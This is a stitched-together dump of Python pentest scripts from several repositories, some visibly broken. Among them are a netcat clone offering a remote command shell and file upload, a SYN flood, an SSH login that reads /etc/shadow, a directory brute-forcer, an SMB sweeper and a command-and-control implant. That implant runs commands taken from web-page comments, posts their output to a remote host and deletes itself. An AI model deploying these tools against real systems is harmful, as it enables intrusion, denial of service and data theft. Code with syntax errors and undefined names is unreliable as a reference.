        for result in _results:
            technology, rex, creds = result
            outputToPrint += _print(file, technology, rex, creds)
    if not config['no_others'] and (config['format'] == 'normal' or config['format'] == 'tabular'):
        outputToPrint += '\n\n=== BELOW LINES MAY BE FALSE POSITIVES:\n'
    for file, _results in otherResultsPerFile.items():
        if config['filename'] and config['format'] in ['raw', 'normal', 'tabular']:
            outputToPrint += '\nResults from file: "{}"\n'.format(file)
        for result in _results:
            technology, rex, creds = result
            outputToPrint += _print(file, technology, rex, creds)
    return outputToPrint
def main(argv):
    """Entry point: parse options, scan a file or directory for credentials,
    and print or dump the matched results.

    :param argv: raw process argument vector (sys.argv)
    :return: False on option/input error, otherwise None (implicit).
    """
    Logger._out('''
        :: Network-configuration Credentials extraction script
        Mariusz Banach / mgeeky, '18
''')
    opts = parseOptions(argv)
    if not opts:
        Logger.err('Options parsing failed.')
        return False
    # Informational: total number of credential patterns across all technologies.
    count = 0
    for technology in regexes:
        count += len(regexes[technology])
    Logger.info('Capable of matching: {} patterns containing credentials.'.format(count))
    # Accept either a single file or a directory tree; `num` is the hit count.
    num = 0
    if os.path.isfile(opts.file):
        num = processFile(opts.file)
    elif os.path.isdir(opts.file):
        num = processDir(opts.file)
    else:
        Logger.err('Please provide either file or directory on input.')
        return False
    out = printResults()
    if config['output']:
        # -o/--output given: write findings to a file instead of stdout.
        Logger.info("Dumping credentials to the output file: '{}'".format(config['output']))
        with open(config['output'], 'w') as f:
            f.write(out)
    else:
        print(out)
    # The summary line only makes sense for the human-readable formats.
    if config['format'] == 'normal' or config['format'] == 'tabular':
        print('\n[>] Found: {} credentials.'.format(num))
if __name__ == '__main__':
    main(sys.argv)
| 36.899142 | 204 | 0.549377 |
cybersecurity-penetration-testing | from immlib import *
class cc_hook(LogBpHook):
    """One-shot logging breakpoint: logs EIP once, then removes itself."""

    def __init__(self):
        LogBpHook.__init__(self)
        self.imm = Debugger()

    def run(self, regs):
        # Invoked by Immunity when the breakpoint fires.
        eip = regs['EIP']
        self.imm.log("%08x" % eip, eip)
        # Remove the breakpoint so every function is traced at most once.
        self.imm.deleteBreakpoint(eip)
def main(args):
    """Hook every discovered function in calc.exe with a one-shot logger."""
    imm = Debugger()
    module = imm.getModule("calc.exe")
    codebase = module.getCodebase()
    imm.analyseCode(codebase)
    functions = imm.getAllFunctions(codebase)
    hook = cc_hook()
    for address in functions:
        hook.add("%08x" % address, address)
    return "Tracking %d functions." % len(functions)
| 19.96875 | 55 | 0.552239 |
cybersecurity-penetration-testing | import sys
import time
from PyQt4.QtCore import *
from PyQt4.QtGui import *
from PyQt4.QtWebKit import *
class Screenshot(QWebView):
    """Off-screen webpage renderer: loads a URL into a QWebView and grabs
    the fully rendered page as a QImage.

    Creates its own QApplication and pumps the Qt event loop manually, so
    it is intended for single-shot scripted use, not inside a Qt app.
    """
    def __init__(self):
        self.app = QApplication(sys.argv)
        QWebView.__init__(self)
        self._loaded = False
        self.loadFinished.connect(self._loadFinished)
    def wait_load(self, delay=0):
        # Spin the event loop until loadFinished flips self._loaded to True.
        while not self._loaded:
            self.app.processEvents()
            time.sleep(delay)
        # Reset the flag so the same instance can load another URL.
        self._loaded = False
    def _loadFinished(self, result):
        # Qt slot: marks the current page load as complete.
        self._loaded = True
    def get_image(self, url):
        """Load `url`, grow the viewport to the full page, return a QImage."""
        self.load(QUrl(url))
        self.wait_load()
        # Resize the viewport to the content size so the whole page renders.
        frame = self.page().mainFrame()
        self.page().setViewportSize(frame.contentsSize())
        image = QImage(self.page().viewportSize(), QImage.Format_ARGB32)
        painter = QPainter(image)
        frame.render(painter)
        painter.end()
        return image
# Demo: render packtpub.com and write the screenshot to website.png.
s = Screenshot()
image = s.get_image('http://www.packtpub.com')
image.save('website.png')
| 25 | 72 | 0.609082 |
cybersecurity-penetration-testing | #!/usr/bin/python3
#
# This script takes an input file containing Node names to be marked in Neo4j database as
# owned = True. The strategy for working with neo4j and Bloodhound becomes fruitful during
# complex Active Directory Security Review assessments or Red Teams. Imagine you've kerberoasted
# a number of accounts, access set of workstations or even cracked userPassword hashes. Using this
# script you can quickly instruct Neo4j to mark that principals as owned, which will enrich your
# future use of BloodHound.
#
# Mariusz Banach / mgeeky
#
import sys
import os
import time
try:
from neo4j import GraphDatabase
except ImportError:
print('[!] "neo4j >= 1.7.0" required. Install it with: python3 -m pip install neo4j')
#
# ===========================================
#
# Specify neo4j connection details
NEO4J_CONNECTION_DETAILS = \
{
'Host': '127.0.0.1', # neo4j listening address.
'Port': 7687, # Bolt port
'User': 'neo4j',
'Pass': 'neo4j1'
}
#
# ===========================================
#
#
# Construct a MATCH ... SET owned=TRUE query of not more than this number of nodes.
# This number impacts single query execution time. If it is more than 1000, neo4j may complain
# about running out of heap memory space (java...).
#
numberOfNodesToAddPerStep = 500
def markNodes(tx, nodes):
    """Mark every node whose name appears in `nodes` as owned.

    The names are sent as a query parameter instead of being string-
    interpolated into the Cypher text: names containing quotes no longer
    break the statement (or allow Cypher injection), and a single UNWIND
    replaces the original N-way UNION of per-node MATCH clauses.

    :param tx: neo4j transaction (as handed to Session.write_transaction)
    :param nodes: list of node name strings to flag with owned=TRUE
    """
    tx.run(
        'UNWIND $names AS name MATCH (n {name: name}) SET n.owned=TRUE',
        names=nodes,
    )
def main(argv):
    """Read node names from the file given in argv[1] and mark them as
    owned=TRUE in the configured neo4j database, in batches, printing
    per-batch timing and an ETA.

    :param argv: sys.argv; argv[1] is the path to the nodes file.
    :return: False on error/interruption, otherwise None (implicit).
    """
    if len(argv) != 2:
        print('''
Takes a file containing node names on input and marks them as Owned in specified neo4j database.
Usage: ./markOwnedNodesInNeo4j.py <nodes-file>
''')
        return False
    nodesFile = argv[1]
    programStart = time.time()
    if not os.path.isfile(nodesFile):
        print(f'[!] Input file containing nodes does not exist: "{nodesFile}"!')
        return False
    # One node name per line; surrounding whitespace is stripped.
    nodes = []
    with open(nodesFile) as f: nodes = [x.strip() for x in f.readlines()]
    try:
        driver = GraphDatabase.driver(
            f"bolt://{NEO4J_CONNECTION_DETAILS['Host']}:{NEO4J_CONNECTION_DETAILS['Port']}",
            auth = (NEO4J_CONNECTION_DETAILS['User'], NEO4J_CONNECTION_DETAILS['Pass']),
            encrypted = False,
            connection_timeout = 10,
            max_retry_time = 5,
            keep_alive = True
        )
    except Exception as e:
        print(f'[-] Could not connect to the neo4j database. Reason: {str(e)}')
        return False
    print('[.] Connected to neo4j instance.')
    if len(nodes) >= 200:
        print('[*] Warning: Working with a large number of nodes may be time-consuming in large databases.')
        print('\te.g. setting 1000 nodes as owned can take up to 10 minutes easily.')
        print()
    finishEta = 0.0
    totalTime = 0.0
    runs = 0
    print('[+] To be marked: {} nodes.'.format(len(nodes)))
    try:
        with driver.session() as session:
            # Process the node list in fixed-size batches to keep each query
            # small enough for neo4j's heap (see numberOfNodesToAddPerStep).
            for a in range(0, len(nodes), numberOfNodesToAddPerStep):
                b = a + min(numberOfNodesToAddPerStep, len(nodes) - a)
                print(f'[.] Marking nodes ({a}..{b}) ...')
                start = time.time()
                session.write_transaction(markNodes, nodes[a:b])
                stop = time.time()
                totalTime += (stop - start)
                runs += 1
                # ETA: remaining batches times the mean batch duration so far.
                finishEta = ((len(nodes) / numberOfNodesToAddPerStep) - runs) * (totalTime / float(runs))
                if finishEta < 0: finishEta = 0
                print(f'[+] Marked {b-a} nodes in {stop - start:.3f} seconds. Finish ETA: in {finishEta:.3f} seconds.')
    except KeyboardInterrupt:
        print('[.] User interruption.')
        driver.close()
        return False
    driver.close()
    programStop = time.time()
    print(f'\n[+] Nodes marked as owned successfully in {programStop - programStart:.3f} seconds.')
| 30.403101 | 119 | 0.597284 |
cybersecurity-penetration-testing | from subprocess import call
import chipwhisperer.capture.ChipWhispererCapture as cwc
from chipwhisperer.capture.scopes.ChipWhispererExtra import CWPLLDriver
import time
try:
from PySide.QtCore import *
from PySide.QtGui import *
except ImportError:
print "ERROR: PySide is required for this program"
sys.exit()
def pe():
    # Pump pending Qt events manually; this script drives the capture GUI
    # without ever entering a proper Qt event loop.
    QCoreApplication.processEvents()
def resetAVR():
    # Reset the target ATmega328P by touching it with avrdude (no flashing).
    call(["/usr/bin/avrdude", "-c", "avrispmkII", "-p", "m328p"])
#Make the application
app = cwc.makeApplication()
#If you DO NOT want to overwrite/use settings from the GUI version including
#the recent files list, uncomment the following:
#app.setApplicationName("Capture V2 Scripted")
#Get main module
cap = cwc.ChipWhispererCapture()
#Show window - even if not used
cap.show()
#NB: Must call processEvents since we aren't using proper event loop
pe()
# Select scope/target modules and route the target through the ChipWhisperer.
cap.setParameter(['Generic Settings', 'Scope Module', 'ChipWhisperer/OpenADC'])
cap.setParameter(['Generic Settings', 'Target Module', 'Simple Serial'])
cap.setParameter(['Target Connection', 'connection', 'ChipWhisperer'])
#Load FW (must be configured in GUI first)
cap.FWLoaderGo()
#NOTE: You MUST add this call to pe() to process events. This is done automatically
#for setParameter() calls, but everything else REQUIRES this, since if you don't
#signals will NOT be processed correctly
pe()
#Connect to scope
cap.doConDisScope(True)
pe()
# Scope/trigger setup: trigger on a falling edge of the target's serial TX
# line and clock the ADC from the target's own clock (EXTCLK x1).
cmds = [
    ['OpenADC', 'Gain Setting', 'Setting', 40],
    ['OpenADC', 'Trigger Setup', 'Mode', 'falling edge'],
    ['OpenADC', 'Trigger Setup', 'Timeout (secs)', 7.0],
    ['OpenADC', 'Clock Setup', 'ADC Clock', 'Source', 'EXTCLK x1 via DCM'],
    ['CW Extra', 'CW Extra Settings', 'Trigger Pins', 'Front Panel A', False],
    ['CW Extra', 'CW Extra Settings', 'Trigger Pins', 'Target IO1 (Serial TXD)', True],
    ['CW Extra', 'CW Extra Settings', 'Clock Source', 'Target IO-IN'],
    ['OpenADC', 'Clock Setup', 'ADC Clock', 'Reset ADC DCM', None]
]
for cmd in cmds: cap.setParameter(cmd)
#Connect to serial port
ser = cap.target.driver.ser
ser.con()
#Set baud rate
cap.setParameter(['Serial Port Settings', 'TX Baud', 9600])
cap.setParameter(['Serial Port Settings', 'RX Baud', 9600])
#Attach special method so we can call from GUI if wanted
cap.resetAVR = resetAVR
#Some useful commands to play with from GUI
#self.resetAVR()
#ser = self.target.driver.ser
#ser.write("@@@")
#ser.write("ce")
#print ser.read(255)
#Run Application
#app.exec_()
# Power-analysis password recovery over the printable ASCII range: a deep
# dip in a specific trace window means the device kept processing past that
# password byte, i.e. the guess was correct.
# NOTE(review): the sample windows (10000:14000, 18000:22000) and -0.1
# threshold are board/firmware specific -- confirm before reuse.
lowest = 32
highest = 126
pass_array = [lowest, lowest]
bytefound = [0, 0]
done = 0
while not done:
    cap.resetAVR()
    time.sleep(0.1)
    ser.write("@@@")
    time.sleep(0.1)
    cap.scope.arm()
    pe()
    ser.write(chr(pass_array[0]) + chr(pass_array[1]))
    if cap.scope.capture(update=True, NumberPoints=None, waitingCallback=pe):
        print "Timeout"
    else:
        print "Capture OK"
    print "Trying {0}{1}".format(chr(pass_array[0]), chr(pass_array[1]))
    if not bytefound[0] and min(cap.scope.datapoints[10000:14000]) > -0.1:
        print "Byte 1 Wrong"
        pass_array[0] += 1
    elif not bytefound[1] and min(cap.scope.datapoints[18000:22000]) > -0.1:
        bytefound[0] = 1
        print "Byte 2 Wrong"
        pass_array[1] += 1
    else:
        bytefound[1] = 1
        print "PASSWORD: {0}{1}".format(chr(pass_array[0]), chr(pass_array[1]))
        print "Password OK? Check response on serial"
        done = 1
    if pass_array[0] >= highest or pass_array[1] >= highest:
        print "Charset exceeded. Expand range?"
        done = 1
    #print ser.read(255)
#Run Application
app.exec_()
#Disconnect before exit to save grief
cap.scope.dis()
cap.target.dis()
| 27.178295 | 83 | 0.679417 |
Python-Penetration-Testing-Cookbook | import urllib.request
import pandas as pd
from bs4 import BeautifulSoup
url = "https://www.w3schools.com/html/html_tables.asp"
try:
page = urllib.request.urlopen(url)
except Exception as e:
print(e)
pass
soup = BeautifulSoup(page, "html.parser")
table = soup.find_all('table')[0]
new_table = pd.DataFrame(
columns=['Company', 'Contact', 'Country'],
index=range(0, 7))
row_number = 0
for row in table.find_all('tr'):
column_number = 0
columns = row.find_all('td')
for column in columns:
new_table.iat[row_number, column_number] = column.get_text()
column_number += 1
row_number += 1
print(new_table)
# Uncomment the bellow line to export to csv
# new_table.to_csv('table.csv')
# Uncomment the bellow line to export to excel
# new_table.to_excel('table.xlsx')
| 23.727273 | 68 | 0.676074 |
owtf | from owtf.plugin.helper import plugin_helper
DESCRIPTION = "Plugin to assist manual testing"
def run(PluginInfo):
    """Render the static placeholder content for this manual-assist plugin."""
    return plugin_helper.HtmlString("Intended to show helpful info in the future")
| 23.777778 | 85 | 0.765766 |
owtf | """
owtf.proxy.socket_wrapper
~~~~~~~~~~~~~~~~~~~~~~~~~
"""
import ssl
from tornado import ioloop
from owtf.proxy.gen_cert import gen_signed_cert
def starttls(
    socket,
    domain,
    ca_crt,
    ca_key,
    ca_pass,
    certs_folder,
    success=None,
    failure=None,
    io=None,
    **options
):
    """Wrap an active socket in an SSL socket.

    Taken from https://gist.github.com/weaver/293449/4d9f64652583611d267604531a1d5f8c32ac6b16.

    A server certificate for `domain` is generated on the fly (signed by the
    supplied CA), the socket is wrapped server-side, and the TLS handshake is
    driven incrementally through the tornado IOLoop without blocking.

    :param socket: already-accepted plain TCP socket to wrap
    :param domain: hostname the generated certificate must cover
    :param ca_crt: path to the CA certificate used for signing
    :param ca_key: path to the CA private key
    :param ca_pass: passphrase for the CA key
    :param certs_folder: cache directory for generated certificates
    :param success: optional callback invoked with the wrapped socket once the
        handshake completes
    :param failure: optional callback invoked with the wrapped socket when the
        handshake fails (default behaviour closes the socket)
    :param io: tornado IOLoop driving the handshake (current loop if None)
    :param options: extra keyword arguments forwarded to ssl.wrap_socket
    :return: the (still handshaking) SSL-wrapped socket
    """
    # # Default Options
    options.setdefault("do_handshake_on_connect", False)
    options.setdefault("ssl_version", ssl.PROTOCOL_TLS)
    options.setdefault("server_side", True)
    # The idea is to handle domains with greater than 3 dots using wildcard certs
    if domain.count(".") >= 3:
        key, cert = gen_signed_cert(
            "*." + ".".join(domain.split(".")[-3:]),
            ca_crt,
            ca_key,
            ca_pass,
            certs_folder,
        )
    else:
        key, cert = gen_signed_cert(domain, ca_crt, ca_key, ca_pass, certs_folder)
    options.setdefault("certfile", cert)
    options.setdefault("keyfile", key)
    # Handlers
    def done():
        """Handshake finished successfully."""
        io.remove_handler(wrapped.fileno())
        success and success(wrapped)
    def error():
        """The handshake failed."""
        if failure:
            return failure(wrapped)
        # # By default, just close the socket.
        io.remove_handler(wrapped.fileno())
        wrapped.close()
    def handshake(fd, events):
        """Drive one step of the TLS handshake with the IOLoop; re-registers
        interest until OpenSSL stops asking for more reads/writes.

        :param fd: file descriptor the event fired on
        :param events: IOLoop event bitmask
        """
        if events & io.ERROR:
            error()
            return
        try:
            new_state = io.ERROR
            wrapped.do_handshake()
            return done()
        except (ssl.SSLError, ssl.SSLEOFError) as exc:
            # BUGFIX: the original wrote `except ssl.SSLError or ssl.SSLEOFError`,
            # which evaluates the `or` first and is equivalent to catching
            # ssl.SSLError alone. A tuple catches both types as intended.
            if exc.args[0] == ssl.SSL_ERROR_WANT_READ:
                new_state |= io.READ
            elif exc.args[0] == ssl.SSL_ERROR_WANT_WRITE:
                new_state |= io.WRITE
            else:
                raise
        if new_state != state[0]:
            state[0] = new_state
            io.update_handler(fd, new_state)
    # set up handshake state; use a list as a mutable cell.
    io = io or ioloop.IOLoop.current()
    state = [io.ERROR]
    # Wrap the socket; swap out handlers.
    io.remove_handler(socket.fileno())
    try:
        wrapped = ssl.wrap_socket(socket, **options)
    except TypeError:
        # if python version less than 3.7
        wrapped = ssl.SSLSocket(socket, **options)
    wrapped.setblocking(0)
    io.add_handler(wrapped.fileno(), handshake, state[0])
    # Begin the handshake.
    handshake(wrapped.fileno(), 0)
    return wrapped
| 23.507576 | 94 | 0.56308 |
Penetration_Testing | '''
Netcat replacement in Python.
Suggestions:
* Run as Python script or as executable to suit your needs.
'''
import sys
import socket
import getopt
import threading
import subprocess
# Define global variables
listen = False              # -l: act as a listener (server mode)
command = False             # -c: offer an interactive command shell on connect
upload = False              # declared global but unused; uploads key off upload_destination
execute = ""                # -e: command to run once per accepted connection
target = ""                 # -t: host to connect to (client) or bind to (server)
upload_destination = ""     # -u: path to write an uploaded file to
port = ""                   # -p: TCP port (set to int by option parsing)
def usage():
    # Print the help banner and terminate; called for -h/--help or bad args.
    print '''
<PyNet>\n
Usage: pynet.py -t <target_IP> -p <port>\n
Options:
-l --listen : listen on <host>:<port> for incoming connections
-e --execute=<file to run> : execute the given file upon receiving a connection
-c --command : initialize a command shell
-u --upload=<destination> : upon receiving a connection, upload a file and write to <destination>
Examples:
pynet.py -t 192.168.0.1 -p 5555 -l -c
pynet.py -t 192.168.0.1 -p 5555 -l -u=c:\\target.exe
pynet.py -t 192.168.0.1 -p 5555 -l -e=\"cat /etc/passwd\"
echo 'ABCDEFGHI' | ./pynet.py -t 192.168.11.12 -p 135
'''
    sys.exit(0)
def client_sender(buffer):
    # Client mode: connect to target:port, send the initial stdin buffer,
    # then relay server responses to stdout and stdin lines back to the server.
    client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        client.connect((target, port))
        if len(buffer):
            client.send(buffer)
        while True:
            # Wait for data
            recv_len = 1
            response = ""
            while recv_len:
                data = client.recv(4096)
                recv_len = len(data)
                response += data
                if recv_len < 4096:
                    # Short read: the server is (assumed) done sending for now.
                    break
            print response
            # Wait for more input
            buffer = raw_input("")
            buffer += "\n"
            # Send the input
            client.send(buffer)
    except:
        print "[!] Error! Exiting..."
        client.close()
def server_loop():
    # Server mode: bind, then accept clients forever, one handler thread each.
    global target
    # If no target is defined, we listen on all interfaces
    if not len(target):
        target = "0.0.0.0"
    server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    server.bind((target, port))
    server.listen(5)
    while True:
        client_socket, addr = server.accept()
        print "[+] Received connection from: {}".format(addr)
        # Spin off a thread to handle our new client
        client_thread = threading.Thread(target=client_handler,
            args=(client_socket,))
        client_thread.start()
def run_command(command):
    """Execute `command` in a shell and return its combined stdout/stderr.

    On any failure (spawn error or non-zero exit status) a generic failure
    string is returned instead, so the caller always has bytes to send back
    over the socket.
    """
    # Trim the trailing newline left by the socket recv loop.
    command = command.rstrip()
    # Run the command and get the output back
    try:
        output = subprocess.check_output(command, stderr=subprocess.STDOUT, shell=True)
    except Exception:
        # Narrowed from a bare `except:` so SystemExit/KeyboardInterrupt are
        # no longer swallowed; failed commands behave exactly as before.
        output = "[!] Failed to execute command.\r\n"
    # Send the output back to the client
    return output
def client_handler(client_socket):
    # Per-connection worker: optionally receive an uploaded file, run a
    # one-shot command, and/or drop into an interactive command shell,
    # depending on which globals the option parsing set.
    global upload
    global execute
    global command
    # Check for upload
    if len(upload_destination):
        # Read in all of the bytes and write to our destination
        file_buffer = ""
        # Keep reading data until none is available
        while True:
            data = client_socket.recv(1024)
            if not data:
                break
            else:
                file_buffer += data
        # Take the bytes and try to write them out
        try:
            file_descriptor = open(upload_destination, "wb")
            file_descriptor.write(file_buffer)
            file_descriptor.close()
            # Acknowledge that we wrote the file out
            client_socket.send("[+] Successfully saved file to: {}\r\n".format(upload_destination))
        except:
            client_socket.send("[!] Failed to save file to: {}\r\n".format(upload_destination))
    # Check for command execution
    if len(execute):
        # Run the command
        output = run_command(execute)
        client_socket.send(output)
    # Go into another loop if a command shell was requested
    if command:
        while True:
            # Show a simple prompt
            client_socket.send("<PyNet:#> ")
            # Receive until we see a linefeed <enter key>
            cmd_buffer = ""
            while "\n" not in cmd_buffer:
                cmd_buffer += client_socket.recv(1024)
            # Send back the command output
            response = run_command(cmd_buffer)
            # Send back the response
            client_socket.send(response)
def main():
global listen
global port
global execute
global command
global upload_destination
global target
if not len(sys.argv[1:]):
usage()
# Read the command line options
try:
opts, args = getopt.getopt(sys.argv[1:], "hle:t:p:cu", ["help", "listen", "execute", "target", "port", "command", "upload"])
except:
print str(err)
usage()
for o, a in opts:
if o in ("-h", "--help"):
usage()
elif o in ("-l", "--listen"):
listen = True
elif o in ("-e", "--execute"):
execute = a
elif o in ("-c", "--commandshell"):
command = True
elif o in ("-u", "--upload"):
upload_destination = a
elif o in ("-t", "--target"):
target = a
elif o in ("-p", "--port"):
port = int(a)
else:
assert False, "Unhandled Option"
# Are we going to listen or just send data from stdin?
if not listen and len(target) and port > 0:
'''
Read in the buffer from the commandline this will block,
so send CTRL-D if not sending input to stdin
'''
print "[*] Press CTRL-D to enter an interactive shell."
buffer = sys.stdin.read()
# Send data
client_sender(buffer)
'''
We are going to listen and potentially upload things, execute
commands, and drop a shell back depending on our command line
options
'''
if listen:
server_loop()
main()
| 20.663755 | 126 | 0.664315 |
cybersecurity-penetration-testing | #!/usr/bin/python
# -*- coding: utf-8 -*-
import pxssh
def send_command(s, cmd):
    # Run one command over the established pxssh session and print its output.
    s.sendline(cmd)
    s.prompt()  # wait for the shell prompt; the output lands in s.before
    print s.before
def connect(host, user, password):
try:
s = pxssh.pxssh()
s.login(host, user, password)
return s
except:
print '[-] Error Connecting'
exit(0)
# Demo: SSH to localhost as root/toor and read root's /etc/shadow entry.
s = connect('127.0.0.1', 'root', 'toor')
send_command(s, 'cat /etc/shadow | grep root')
| 16.5 | 46 | 0.563246 |
cybersecurity-penetration-testing | import urllib
import urllib2
import threading
import Queue
threads = 50 # Be aware that a large number of threads can cause a denial of service!!!
target_url = "http://www.example.com"
wordlist_file = "directory-list.txt"
user_agent = "Mozilla/5.0 (X11; Linux x86_64; rv:19.0) Gecko/20100101 Firefox/19.0"
def wordlist(wordlist_file):
    """Load the word-list file and return its lines, stripped of trailing
    whitespace, as a thread-safe Queue of work items."""
    words = Queue.Queue()
    with open(wordlist_file, "rb") as handle:
        for line in handle.readlines():
            words.put(line.rstrip())
    return words
def dir_bruteforce(extensions=None):
    # Worker thread body: pull words off the shared queue and probe each
    # candidate path on target_url, optionally trying every extension too.
    while not word_queue.empty():
        attempt = word_queue.get()
        attempt_list = []
        # check if there is a file extension if not
        # it's a directory path we're bruting
        if "." not in attempt:
            attempt_list.append("/%s/" % attempt)
        else:
            attempt_list.append("/%s" % attempt)
        # if we want to bruteforce extensions
        if extensions:
            for extension in extensions:
                attempt_list.append("/%s%s" % (attempt,extension))
        # iterate over our list of attempts
        for brute in attempt_list:
            url = "%s%s" % (target_url,urllib.quote(brute))
            try:
                headers = {}
                headers["User-Agent"] = user_agent
                r = urllib2.Request(url,headers=headers)
                response = urllib2.urlopen(r)
                if len(response.read()):
                    # Non-empty successful response: report the discovered path.
                    print "[%d] => %s" % (response.code,url)
            except urllib2.HTTPError,e:
                # 404s are expected noise; surface any other HTTP error code.
                if e.code != 404:
                    print "!!! %d => %s" % (e.code,url)
                pass
# Build the shared work queue and fan the brute force out across N threads.
# NOTE(review): the spawned threads are never join()ed here; the process
# stays alive only because the workers are non-daemon threads -- confirm.
word_queue = wordlist(wordlist_file)
extensions = [".php",".bak",".orig",".inc"]
for i in range(threads):
    t = threading.Thread(target=dir_bruteforce,args=(extensions,))
t.start() | 28.473684 | 101 | 0.513176 |
Python-Penetration-Testing-Cookbook |
from scapy.all import *
iface = "en0"
destination_ip = '192.168.1.5'
def synFlood(destination, iface):
    # Loop-send SYN packets to ports 22 and 80 of `destination` from random
    # source ports, then print scapy's answered/unanswered summaries.
    print ("Starting SYN Flood")
    paket=IP(dst=destination,id=1111,ttl=99)/TCP(sport=RandShort(),dport=[22,80],seq=12345,ack=1000,window=1000,flags="S")/"HaX0r SVP"
    ans,unans=srloop(paket, iface=iface, inter=0.3,retry=2,timeout=4)
    ans.summary()
    unans.summary()
# Run the flood until the user interrupts with Ctrl-C.
# NOTE(review): `sys` is never imported explicitly; this relies on
# `from scapy.all import *` re-exporting it -- confirm before reuse.
try:
    synFlood(destination_ip, iface)
except KeyboardInterrupt:
    print("Exiting.. ")
    sys.exit(0)
| 26.222222 | 134 | 0.687117 |
cybersecurity-penetration-testing | import socket
from datetime import datetime
# Interactive setup: take the first three octets of the given IP as the
# network base, plus an inclusive last-octet range to sweep.
net= raw_input("Enter the IP address ")
net1= net.split('.')
a = '.'
net2 = net1[0]+a+net1[1]+a+net1[2]+a
st1 = int(raw_input("Enter the Starting Number "))
en1 = int(raw_input("Enter the Last Number "))
en1=en1+1  # make the end of the range inclusive for xrange()
t1= datetime.now()
def scan(addr, port=445):
    """Probe addr:port with a 1-second TCP connect; return 1 if the port is
    open, 0 otherwise.

    The port defaults to 445 (SMB) so existing callers are unaffected; it is
    now a parameter so the same helper can sweep other services.
    """
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    # Global side effect kept from the original: every new socket gets a
    # 1-second default timeout.
    socket.setdefaulttimeout(1)
    try:
        result = sock.connect_ex((addr, port))
    finally:
        # BUGFIX: the original leaked one socket per probe; always release it.
        sock.close()
    if result == 0:
        return 1
    else:
        return 0
def run1():
    # Sweep the configured last-octet range and report hosts with 445 open.
    for ip in xrange(st1,en1):
        addr = net2+str(ip)
        if (scan(addr)):
            print addr , "is live"
# Run the sweep and measure the elapsed time.
run1()
t2= datetime.now()
total =t2-t1
print "scanning complete in " , total | 21.517241 | 55 | 0.673313 |
Python-Penetration-Testing-for-Developers | import requests
import re
import subprocess
import time
import os
# Implant loop: poll the page every 30s for commands hidden in HTML comments,
# execute them, and exfiltrate base64-encoded output via the guestbook form.
while 1:
    req = requests.get("http://127.0.0.1")
    comments = re.findall('<!--(.*)-->',req.text)
    for comment in comments:
        if comment == " ":
            # BUGFIX: was `if comment = " ":` (a syntax error). A single-space
            # comment is the kill switch: remove this implant from disk.
            # BUGFIX: os.delete does not exist; os.remove is the real API.
            os.remove(__file__)
        else:
            try:
                response = subprocess.check_output(comment.split())
            except Exception:
                # BUGFIX: the original line was unquoted mojibake
                # (`response = ?command fail?`) and did not parse.
                response = "command fail"
            data={"comment":(''.join(response)).encode("base64")}
            newreq = requests.post("http://127.0.0.1notmalicious.com/xss/easy/addguestbookc2.php ", data=data)
    time.sleep(30)
| 23.666667 | 99 | 0.667311 |
Python-Penetration-Testing-for-Developers | import re
import random
import urllib
# Append one random lowercase letter to the URL to force a missing page,
# then inspect the 404 body for a default server <address> banner, which
# indicates the site is not using a custom error page.
url1 = raw_input("Enter the URL ")
u = chr(random.randint(97,122))
url2 = url1+u
http_r = urllib.urlopen(url2)
content= http_r.read()
flag =0
i=0
list1 = []
a_tag = "<*address>"
file_text = open("result.txt",'a')
while flag ==0:
    if http_r.code == 404:
        # Log the raw 404 body for later review.
        file_text.write("--------------")
        file_text.write(url1)
        file_text.write("--------------\n")
        file_text.write(content)
        print content
        # Record start/end offsets of every <address>/</address> style tag.
        for match in re.finditer(a_tag,content):
            i=i+1
            s= match.start()
            e= match.end()
            list1.append(s)
            list1.append(e)
        if (i>0):
            print "Coding is not good"
        if len(list1)>0:
            # NOTE(review): list1 holds [start0, end0, start1, end1, ...];
            # indices [1] and [2] span "end of first tag .. start of second
            # tag", i.e. the text between the tags. Looks deliberate but
            # fragile -- confirm it is not an off-by-one.
            a= list1[1]
            b= list1[2]
            print content[a:b]
        else:
            print "error handling seems ok"
        flag =1
    elif http_r.code == 200:
        print "Web page is using custome Error page"
        break
| 15.918367 | 46 | 0.603865 |
cybersecurity-penetration-testing | import requests
import re
from bs4 import BeautifulSoup
import sys
# Collect every <script src=...> from the target page, then inspect any
# jquery.min reference and report whether its version string is current.
scripts = []
if len(sys.argv) != 2:
    print "usage: %s url" % (sys.argv[0])
    sys.exit(0)
tarurl = sys.argv[1]
url = requests.get(tarurl)
soup = BeautifulSoup(url.text)
for line in soup.find_all('script'):
    newline = line.get('src')
    scripts.append(newline)
for script in scripts:
    if "jquery.min" in str(script).lower():
        print script
        url = requests.get(script)
        # NOTE(review): assumes the first digit-led token in the fetched file
        # is the jQuery version (true for the standard header comment), and
        # hard-codes 2.1.1/1.12.1 as "current" -- both are fragile.
        comments = re.findall(r'\d[0-9a-zA-Z._:-]+',url.text)
        if comments[0] == "2.1.1" or comments[0] == "1.12.1":
            print "Up to date"
        else:
            print "Out of date"
            print "Version detected: "+comments[0]
#try:
# if newline[:4] == "http":
# if tarurl in newline:
# urls.append(str(newline))
# elif newline[:1] == "/":
# combline = tarurl+newline
# urls.append(str(combline))
#except:
# pass
# print "failed"
#for uurl in urls:
# if "jquery" in url:
# | 20.642857 | 55 | 0.638767 |
Python-Penetration-Testing-Cookbook | #! /usr/bin/env python
from scapy.all import *
def parsePacket(pkt):
    """Return 'hwsrc psrc' for ARP who-has/is-at packets, None otherwise."""
    if ARP not in pkt:
        return None
    if pkt[ARP].op not in (1, 2):
        return None
    return pkt.sprintf("%ARP.hwsrc% %ARP.psrc%")
# Capture ARP traffic only (BPF filter "arp"); sniff() prints whatever
# parsePacket returns, and store=0 avoids buffering packets in memory.
sniff(prn=parsePacket, filter="arp", store=0)
| 19.181818 | 52 | 0.633484 |
PenetrationTestingScripts | # -*- coding: utf-8 -*-
# Generated by Django 1.9.1 on 2016-01-07 23:03
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
    # Adds NmapScan.status_text: a 16-character scan-state label.
    dependencies = [
        ('nmaper', '0003_nmapprofile'),
    ]
    operations = [
        migrations.AddField(
            model_name='nmapscan',
            name='status_text',
            # default='waiting' back-fills existing rows during the migration;
            # preserve_default=False then drops the default from the field, so
            # new rows must set status_text explicitly.
            field=models.CharField(default='waiting', max_length=16),
            preserve_default=False,
        ),
    ]
| 21.863636 | 69 | 0.595618 |
Penetration-Testing-Study-Notes | #!/usr/bin/python2.7
# Copyright (c) 2003-2012 CORE Security Technologies
#
